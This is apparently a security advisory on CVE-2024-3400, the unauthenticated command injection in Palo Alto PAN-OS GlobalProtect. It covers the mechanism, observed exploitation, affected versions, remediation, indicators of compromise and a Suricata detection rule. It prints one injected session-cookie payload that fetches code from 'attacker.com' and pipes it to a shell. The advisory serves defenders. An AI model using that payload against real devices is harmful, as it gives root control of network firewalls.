Background
Palo Alto Networks PAN-OS is the operating system powering the company’s next-generation firewalls and Panorama network security management platform. GlobalProtect is the VPN/ZTNA component of PAN-OS, providing remote access for enterprise users. PAN-OS firewalls are deployed extensively in enterprise, government, and critical infrastructure environments as the primary network security enforcement point.
CVE-2024-3400 is a CVSS 10.0 command injection vulnerability discovered by Volexity during incident response in mid-April 2024. It was exploited as a zero-day by a state-sponsored threat actor (UTA0218, assessed as linked to China) before Palo Alto Networks could issue a patch. The vulnerability’s combination of zero-authentication requirement, CVSS 10.0 score, and widespread deployment in security-critical infrastructure made it one of the most significant vulnerabilities of 2024.
Technical Mechanism
CVE-2024-3400 resides in the GlobalProtect gateway component of PAN-OS. The vulnerability is a command injection in the way PAN-OS processes session IDs for GlobalProtect connections.
When a GlobalProtect client connects, the appliance creates a session and assigns a session ID stored in a cookie. The session ID handling code writes session data to disk using a filename derived from the session ID. Critically, the session ID is not sanitised before being used to construct a file path and subsequently a shell command. An attacker can inject OS commands into the session ID, which are executed when the session is processed:
# Malicious session cookie value
SESSID=../../../../tmp/$(curl${IFS}attacker.com/$(id)|sh).datThe vulnerability has two requirements that must both be satisfied:
- GlobalProtect gateway or portal must be enabled (
Device > GlobalProtect > GatewaysorPortals) - Device telemetry must be enabled — the telemetry process that fires the vulnerable code path
This two-condition requirement initially led to some confusion in scope, but Palo Alto later clarified that device telemetry is on by default in most configurations.
The exploited code path:
- Unauthenticated POST to the GlobalProtect login endpoint creates a session ID based on attacker-supplied data
- Session ID is written to a file using a name derived from the ID without sanitisation
- A background process (cron-based telemetry collector) reads these files and passes the filenames to a shell command
- Shell metacharacters in the filename execute arbitrary commands as root
Real-World Exploitation Evidence
Volexity discovered this vulnerability while responding to an intrusion at a customer site in April 2024. The threat actor, UTA0218, had been operating on the compromised firewall for approximately two weeks before discovery.
Post-exploitation activity documented by Volexity and Palo Alto Unit 42:
- UPSTYLE backdoor: A Python-based backdoor written to the filesystem that executes commands received via crafted network packets, designed to blend with legitimate traffic and avoid log generation.
- Firewall configuration exfiltration: Attackers exported the full running configuration of the firewall, including credentials, VPN settings, and routing information.
- Tunnel creation: Attackers created reverse tunnels from the firewall to external attacker infrastructure, providing persistent access through subsequent reboots.
- Internal network pivot: Once established on the firewall, attackers used it to scan internal networks, access Active Directory, and target other high-value internal systems.
- GLIBC exploitation: Some intrusions progressed to exploiting the underlying Linux OS components for additional persistence.
Mass exploitation began within 24 hours of the public advisory. Within two weeks, over 22,000 PAN-OS devices were estimated to be compromised or at high risk.
Impact Assessment
A compromised PAN-OS firewall is among the most severe breach scenarios in enterprise security:
- Root-level code execution: Commands run as root on the firewall OS, providing complete control over the security device.
- Network traffic inspection: Attackers can reconfigure the firewall to decrypt and inspect traffic that would otherwise be protected, including TLS traffic.
- Configuration exfiltration: VPN credentials, routing tables, security policies, and network topology information are all accessible.
- NAT/routing manipulation: Attackers can redirect network traffic to attacker-controlled infrastructure.
- Security control bypass: The device protecting the network becomes the attacker’s tool, allowing arbitrary traffic to traverse network segments.
Affected Versions
| PAN-OS Version | Affected | Fixed Version |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3 |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1 |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1 |
| PAN-OS 10.1 and earlier | Not affected | N/A |
Note: Only devices with GlobalProtect gateway or portal and device telemetry enabled are vulnerable.
Remediation Steps
-
Apply hotfix patches immediately: Palo Alto released out-of-band hotfix patches on April 14, 2024. Apply the version specific to your PAN-OS branch.
-
Verify GlobalProtect and telemetry status: Check if your device is in the vulnerable configuration:
> show global-protect-gateway current-user > show deviceconfig setting telemetry -
Interim workaround — disable device telemetry: If patching is not immediately possible, disabling device telemetry prevents the vulnerable code path from triggering:
# Navigate to: Device > Setup > Telemetry > Uncheck all telemetry options -
Threat Prevention signature: Palo Alto released Threat Prevention signature ID 95187 to block exploitation attempts. Enable it if you have a Threat Prevention subscription:
# Verify signature is active in Security > Vulnerability Protection profiles -
Forensic review: Run Palo Alto’s published detection script on all potentially exposed devices to check for UPSTYLE backdoor or other compromise indicators.
-
Rotate all credentials: Treat all credentials stored in GlobalProtect configuration as compromised if the device was exposed.
Detection Guidance
Log sources:
- PAN-OS system logs:
tail /var/log/pan/pan.log - GlobalProtect logs: Check
Monitor > Logs > GlobalProtect - Process execution logs: Check for unusual processes spawned by the telemetry service
Indicators of compromise:
- Presence of
/opt/panlogs/tmp/device_telemetry/wfd/*.sh(UPSTYLE artifact) - Unexpected Python processes or shell processes spawned by
pan_gcdor telemetry daemons - Outbound connections from the firewall management interface to non-Palo Alto IPs
- Modifications to
/etc/cron.d/or/var/schedd.conf - Session IDs containing shell metacharacters in GlobalProtect logs
Suricata signature:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"PAN-OS CVE-2024-3400 GlobalProtect Exploit"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ssl-vpn/hipreport.esp"; pcre:"/SESSID=[^;]*[\$\`\|;]/"; sid:9000034; rev:1;)Timeline
| Date | Event |
|---|---|
| March 26, 2024 | Earliest evidence of UTA0218 exploitation (Volexity) |
| April 10, 2024 | Volexity discovers active exploitation during incident response |
| April 12, 2024 | Palo Alto Networks notified; publishes advisory same day |
| April 12, 2024 | CISA adds CVE-2024-3400 to KEV catalogue |
| April 14, 2024 | Palo Alto releases hotfix patches |
| April 15, 2024 | PoC exploits published publicly |
| April 22, 2024 | Palo Alto confirms over 22,000 devices potentially compromised |